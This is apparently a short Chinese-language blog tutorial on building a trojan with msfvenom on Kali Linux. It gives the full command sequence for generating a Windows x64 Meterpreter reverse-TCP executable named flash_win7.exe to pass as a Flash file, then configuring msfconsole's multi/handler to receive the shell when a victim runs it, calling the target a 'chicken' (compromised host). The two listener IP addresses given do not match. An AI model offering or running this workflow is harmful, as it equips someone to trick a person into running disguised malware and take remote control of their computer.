kali msfvenom生成木马

在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以这就只写一些关于msfvenom的东西。

 

这里就只是记录下生成一个程序的过程。

 

 

msfvenom

 

msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

1.首先还是得打开postgresql
root@kali:~# service postgresql start

2.让我们正式开始吧,因为我的目标平台是一个win7 64 位,所以要找一个相应的载荷。


root@kali:~# msfvenom -l | grep windows | grep x64 | grep tcp

3.生成木马(默认路径是在home下)

lhost 填写自己本机的IP(因为这种木马是用反弹机制)

lport 为反弹端口(填写你打算监听的端口)


root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.3 lport=443 -f exe X > flash_win7.exe

4.启动msfvenom


root@kali:~# msfconsole

 

5.通过msfconsole开始监听


root@kali:~# use exploit/multi/handler

6.设置监听的环境(肉鸡环境)


root@kali:~# set payload windows/x64/meterpreter_reverse_tcp 

7.设置监听的ip(本地ip)


root@kali:~# set lhost 192.168.1.103

8.设置监听的端口(木马反弹的端口)


root@kali:~# set lport 443

9.开始监听


root@kali:~# exploit 

 

10.当目标运行程序的时候,便能获得shell

 

 

你可能感兴趣的:(linux,kali,病毒区)